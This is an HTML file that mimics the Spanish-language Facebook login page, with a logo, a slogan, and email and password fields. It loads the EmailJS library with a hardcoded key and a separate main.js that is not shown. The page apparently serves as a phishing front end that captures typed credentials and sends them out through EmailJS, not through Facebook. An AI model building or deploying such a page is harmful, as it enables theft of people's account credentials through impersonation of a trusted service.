<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión</title>
    <script type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
  
  <script type="text/javascript">
    emailjs.init('SX0hNGD4QjgUC56Rt')
  </script>
    

    
    <link rel="stylesheet" href="facebook.css">

</head>

<body>
    <div class="Text-1">
        <img src="logo.svg" alt="Facebook_Logo">
        <h3>Conectate con amigos y el mundo <br> que te rodea en Facebook</h3>
    </div>


    <div class="login-container">
<form id="form">
         <input type="text" name="email_id" id="email_id" placeholder="Correo electrónico o numero de telefono">

        <input type="text" name="password" id="password" placeholder="Contraseña">

            <button type="submit" id="button" value="INICIAR SESION"><b>Iniciar sesión</b></button>
        </form>
        <br>
        <a href="#" class="desaparece-Line">¿Olvidaste tu contraseña?</a>
        <br><br>
        <hr><br>
        <span><b>Crear nueva cuenta</b></span>
    </div>
    <p><a href="#" class="desaparece-Completo"><b>Crea una pagina</b></a>
        para una celebridad, una marca o un <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
        &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
        &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;negocio.</p>



</body>
<script src="main.js"></script>
</html>
